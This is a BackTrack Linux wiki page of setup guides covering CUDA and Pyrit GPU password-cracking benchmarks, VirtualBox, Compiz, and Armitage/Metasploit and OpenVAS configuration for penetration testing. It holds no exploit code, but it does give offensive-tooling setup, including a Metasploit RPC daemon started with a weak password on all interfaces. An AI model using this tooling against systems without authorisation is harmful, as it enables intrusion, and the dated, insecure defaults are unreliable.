Advanced Corner

From BackTrack Linux
Jump to: navigation, search

This section is dedicated to interesting how-to's, various setups etc.

Pentesting VoIP

NightRang3r provided an excellent introductory writeup on Pentesting VoIP With BackTrack where he covers the SIP protocol and a wide range of tools and techniques for attacking them.

Getting Cuda working on Backtrack 4

BackTrack includes many tools which utilize the power of graphics cards to greatly improve performance. This section will help you get your environment set up to use these tools and also to set up a development environment to make your own tools

Check http://en.wikipedia.org/wiki/CUDA to see if your video card is capable of running CUDA applications

Installing the Nvidia Drivers

Installing the driver is now easier than ever. We use the installer from the nvidia web site and do not alter the install in any way. This means no matter which kernel version you are running on backtrack the nvidia-driver package should work

Note: Be sure to log out of X before installing the driver or it will fail

root@bt:~# apt-get install nvidia-driver

Simply follow the prompts and choose the defaults and you should be fine

Since every system is different there are 2 ways to get your xorg.conf working on backtrack.

Method 1: The installer attempts to do this method but in some cases its needed to do it manually. Log out of the X server

root@bt:~# Xorg -configure
root@bt:~# cp /root/xorg.conf.new /etc/X11/xorg.conf
root@bt:~# startx

Method 2: Nvidia bundles a config tool with their install which may work better for you that the Xorg tools Log out of the X server

root@bt:~# nvidia-xconfig
root@bt:~# startx

Installing the CUDA Toolkit

The toolkit contains the nvcc compiler and all the libraries needed to build any GPU based applications from source. The toolkit is also needed if you are planning on developing any of your own applications.

root@bt:~# apt-get install cuda-toolkit

The default install is /opt/cuda

Note: The toolkit is designed to be installed as root. If you want to install it as another user you will need to add the following lines to the users .bashrc file

PATH=$PATH:/usr/local/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib
export PATH
export LD_LIBRARY_PATH

Installing the Nvidia SDK

We no longer package the cuda code samples in our repositories due to the size the package has become. The code samples are extremely useful though if you are interested in cuda development. Getting it installed on backtrack is fairly simple.

root@bt:~# wget http://developer.download.nvidia.com/compute/cuda/3_1/sdk/gpucomputingsdk_3.1_linux.run
root@bt:~# chmod 755 gpucomputingsdk_3.1_linux.run
root@bt:~# ./gpucomputingsdk_3.1_linux.run

The only thing I change aside from the default choices is the place where the NVIDIA_SDK is installed. On backtrack we install to /opt so since I like to keep my stuff in the same place I instruct the installer to install to /opt/cuda/ so that my code samples are inside my cuda directory

Getting up and running with Pyrit

Pyrit is included in the backtrack iso but in order to use it with cuda you will need to install the cuda kernel module. This is part of the cpyrit package. Installation is fairly straight forward:

root@bt:~# apt-get install cpyrit-cuda

You can check if your GPU is being recognized with the following command:

root@bt:~# pyrit list_cores
Pyrit 0.3.1-dev (svn r279) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
The following cores seem available...
#1:  'CUDA-Device #1 'GeForce GTX 295
#2:  'CUDA-Device #2 'GeForce GTX 295
#3:  'CUDA-Device #3 'GeForce GTX 295
#4:  'CUDA-Device #4 'GeForce GTX 295
#5:  'CUDA-Device #5 'GeForce GTX 295
#6:  'CUDA-Device #6 'GeForce GTX 295
#7:  'CUDA-Device #7 'GeForce GTX 295
#8:  'CUDA-Device #8 'GeForce GTX 295


You can then run a benchmark to see how many keys per second your system in capable of:

root@bt:~# pyrit benchmark
Pyrit 0.3.1-dev (svn r279) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (97384.8 PMKs/s)... |
Computed 97384.83 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce GTX 295: 11520.5 PMKs/s (RTT 2.9)
#2: 'CUDA-Device #2 'GeForce GTX 295: 11274.3 PMKs/s (RTT 2.9)
#3: 'CUDA-Device #3 'GeForce GTX 295: 10439.3 PMKs/s (RTT 2.9)
#4: 'CUDA-Device #4 'GeForce GTX 295: 11095.7 PMKs/s (RTT 2.9)
#5: 'CUDA-Device #5 'GeForce GTX 295: 10564.8 PMKs/s (RTT 2.6)
#6: 'CUDA-Device #6 'GeForce GTX 295: 10533.7 PMKs/s (RTT 2.9)
#7: 'CUDA-Device #7 'GeForce GTX 295: 10414.8 PMKs/s (RTT 2.6)
#8: 'CUDA-Device #8 'GeForce GTX 295: 11333.7 PMKs/s (RTT 2.9)

Add CUDA syntax highlighting to Vim

I like to use Vim for coding so here is how to add CUDA syntax highlighting to Backtrack


First we need to install vim-full:

root@bt:~# apt-get install vim-full

Then grab the syntax file:

root@bt:~# cd /usr/share/vim/vim71/syntax/
root@bt:/usr/share/vim/vim71/syntax# wget http://www.backtrack-linux.org/patches/cu.vim.txt
root@bt:/usr/share/vim/vim71/syntax# mv cu.vim.txt cu.vim

Next change into your root directory (or whichever user you are using):

root@bt:~# touch .vimrc
root@bt:~# vi .vimrc

Add the following lines:

au BufNewFile,BufRead *.cu set ft=cu
syntax on

Now your vi should be set up for CUDA syntax highlighting


Installing Virtual Box on Backtrack 4 R2

It should be noted that adding third party repositories to any distribution can cause problems. That being said, many of us have downloaded and installed Virtual box using this method with out any problems.

Downloading and Installing

Add the repository to your source file

root@bt:~#  echo "deb http://download.virtualbox.org/virtualbox/debian intrepid non-free" >> /etc/apt/sources.list

Download the Oracle public key and install it

root@bt:~# wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -
OK

Update your system

root@bt:~# sudo apt-get update

Install Virtual Box

root@bt:~# apt-get install virtualbox-3.1

What to do when experiencing GPG error: following signatures were invalid

root@bt:~# sudo -s -H
root@bt:~# apt-get clean
root@bt:~# rm /var/lib/apt/lists/*
root@bt:~# rm /var/lib/apt/lists/partial/*
root@bt:~# mkdir /var/lib/apt/lists/partial
root@bt:~# apt-get clean
root@bt:~# apt-get update

If you have completed the steps properly you should now be able to launch Virtual Box from the System section of the KDE menu


Installing BackTrack and guest additions in Virtual Box

Download and check the BackTrack iso following this guide

http://www.backtrack-linux.org/wiki/index.php/Downloading

Install BackTrack following this guide

http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk

Once BackTrack is installed

Install Virtual Box guest additions in BackTrack

Install lastest dkms package from BT repository

root@bt:~# apt-get update
root@bt:~# apt-get upgrade
root@bt:~# apt-get install dkms

Then

root@bt:~# mount /dev/hdX /mnt/cdrom
root@bt:~# cd /mnt/cdrom
root@bt:~# ./VBoxLinuxAdditions-x86.run

where /dev/hdX is replaced by your Virtual Box guest additions drive assignment

Follow any onscreen instructions.

Once completed.

root@bt:~# reboot

Now we should check the the guest additions have installed correctly.

So run

root@bt:~# /usr/bin/VBoxClient-all

Then check that the services have started correctly

root@bt:~# ps ax |grep VBoxClient
 6351 ?        Sl     0:00 /usr/bin/VBoxClient --clipboard
 6355 ?        Sl     0:01 /usr/bin/VBoxClient --display
 6356 ?        Sl     0:01 /usr/bin/VBoxClient --seamless
 6404 pts/1    S+     0:01 grep VBoxClient
root@bt:~#

Where you should see output similar to that shown above.

Now we need to make the services autostart when the system boots

root@bt:~# nano /root/.xinitrc

and add this line at the end

exec /usr/bin/VBoxClient-all

^O to save the changes to the file

^X to exit nano

Finally we should now restart our virtual machine just to make sure all the guest additions and the autostart of the services are working correctly.

root@bt:~# reboot

Enjoy your BackTrack Virtual Box install with all of the Guest additions fully working.


Installing VMware Workstation with BackTrack as the Host OS

The latest VMware Workstation (At the time of writing VMware-Workstation-Full-7.1.3-324285.i386.bundle) installs flawlessly with the latest BackTrack r2 2.6.35.8 kernel.

It is a simple case of running the ./VMware-Workstation-Full-7.1.3-324285.i386.bundle and then following the directions in the GUI that pops up.

The VMware programs can then be found in the KDE menu > System.


Installing Compiz-Fusion on Backtrack 4 R2

Compiz-Fusion can add some really nice graphics and effects to your Backtrack installation. We do not include it by default but it can be added fairly easily. Keep in mind these programs can be resource intensive so be sure you have adequate ram and processing. You will also need to be sure you have compositing enabled in the xorg.conf and that your graphics card is supported.

Downloading and Installing

Download the following packages.

root@bt:~#apt-get install compiz compiz-fusion-plugins-extra compiz-fusion-plugins-unsupported emerald simple-ccsm fusion-icon

Go to backtrack menu -> system -> compiz fusion Right click the Compiz-Fusion icon and select "Reload Window Manager"

Adding compiz to startup

Go to /etc/ and edit the file called "rc.local". And just add the files you installed to it, like this:

#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

compiz
compiz-fusion-plugins-extra
compiz-fusion-plugins-unsupported
emerald
simple-ccsm
fusion-icon

exit 0

Now open a terminal and type in

root@bt:~#chmod u+x /etc/rc.local

Reboot and Compiz-Fusion should start with the system

Armitage Setup

To install Armitage in BackTrack, we simply need to update the repositories and install the "armitage" package.

root@bt:~# apt-get update
...snip...
Reading package lists... Done
root@bt:~# apt-get install armitage
...snip...
Unpacking armitage (from .../armitage_0.1-bt0_i386.deb) ...
Setting up armitage (0.1-bt0) ...
root@bt:~#


Armitage communicates with Metasploit via the RPC daemon so we need to start that next.

root@bt:~# msfrpcd -f -U msf -P test -t Basic
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic...


Next, we need to start our MYSQL server so Armitage has a place to store its results.

root@bt:~# /etc/init.d/mysql start
Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
root@bt:~#


Lastly, we need to run "armitage.sh" from the /pentest/exploits/armitage directory at which point, we are presented with the connection dialog.

root@bt:~# cd /pentest/exploits/armitage
root@bt:/pentest/exploits/armitage# ./armitage.sh


Armitage connect.png


We select the "Use SSL" checkbox, verify the rest of the settings and click "Connect". Afterwards, the main Armitage window is displayed.

Armitage launched.png

For more information on Armitage and Metasploit usage, be sure to check out our free Metasploit Unleashed training course.


Getting started with OpenVas

This guide will show you how to setup OpenVas so that you can use it properly. Since the easiest way to use OpenVas is through the GUI we will need to start the X-server.

Adding a user to OpenVas

The first thing we want to do is add a user for our OpenVas scanner. You can add as many as you need, but we will only focus on adding one.


Openvasadduser1.png


Clicking the menu entry will bring up a console where you will create the user. Alternatively "openvas-adduser" in the console. Here we will define a user named "test"


  Using /var/tmp as a temporary file holder.
  Add a new openvassd user
  ---------------------------------
  Login : test
  Authentication (pass/cert) [pass] : Hitting Enter accepts the default in this case a password
  Login password : 
  Login password (again) : 
  User rules
  ---------------
  openvassd has a rules system which allows you to restrict the hosts that test has the right to test.
  For instance, you may want him to be able to scan his own host only.
  Please see the openvas-adduser(8) man page for the rules syntax.
  Enter the rules for this user, and hit ctrl-D once you are done:
  (the user can have an empty rules set)
  Login             : test
  Password          : ***********
  Rules             : 
  Is that ok? (y/n) [y] y
  user added.
  root@bt:~#


Once you are satisfied with your user account select 'y' to create it and return to the shell.

Creating a Certificate

When adding a user to OpenVas you have the options to choose between having a password or certificate for authentication. Here we will create a certificate. You can either go through the menu system (OpenVas Make Cert) or open a console and type "openvas-mkcert"

Note: You do not need to do this step in order to use OpenVas.


  -------------------------------------------------------------------------------
  Creation of the OpenVAS SSL Certificate
  ------------------------------------------------------------------------------
  This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
  Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the 
  ability to connect to your OpenVAS daemon will be able to retrieve this information.
  
  CA certificate life time in days [1460]:  
  Server certificate life time in days [365]: 
  Your country (two letter code) [DE]: 
  Your state or province name [none]:  Hitting Enter will accept the defaults
  Your location (e.g. town) [Berlin]: 
  Your organization [OpenVAS Users United]:
  -------------------------------------------------------------------------------
  Creation of the OpenVAS SSL Certificate
  -------------------------------------------------------------------------------
  Congratulations. Your server certificate was properly created.
  /usr/local/etc/openvas/openvassd.conf updated
  The following files were created:
  . Certification authority:
     Certificate = /usr/local/var/lib/openvas/CA/cacert.pem
     Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem
  . OpenVAS Server : 
      Certificate = /usr/local/var/lib/openvas/CA/servercert.pem
      Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem
  Press [ENTER] to exit
  root@bt:~#

Synchronize OpenVas NVT's

Now that we have a user for OpenVas, you need to synchronize the NVT's (Network Vulnerability Tests)


Openvasnvtsync.png


Again clicking the menu entry will launch a console and start the synchronization process. Once you start this process it may take quite a bit of time depending on your computer and network as well as the number of NVT's to sync.


Opevnasnvtsyncsnip2.png


Upon completion the console will return to the prompt. Once it does exit it.


Start Openvas Scanner

Now that you have synchronized the NVT database you can start the Openvas scanner. In the console it's "openvassd".


Startopenvasscaner1.png


Starting the scanner may take some time, as it will load the NVT's. Once it is finished you should see the following.


Startopenvasscannerpluginsloaded.png


Start OpenVas Client and connect to Scanner

There are two ways in which you can run OpenVas. The first is through the GUI client, and the second is the command line interface. Which one you use is up to your needs. Using the menu you would select on OpenVas Client. In the console it is "OpenVAS-Client". Once the client starts up you will need to connect it to the scanner, and give in the supplied user credentials, if you created a certificate then you can supply it here as well.


Openvasclientconnectsnip.png


Clientlogonsnip.png


If you created a certificate then you can supply it here as well.


Sslsetupsnip.png


Note: Once you click on "ok" the client will load the plugins and this may take some time to complete. When all of the plugins are loaded the pop-up will let you know this and ask you to select "ok".


Connectinglocalhostsnip.png


After hitting "ok" you will be logged onto the client and connected to the scanner.


Clientafterconnectsnip.png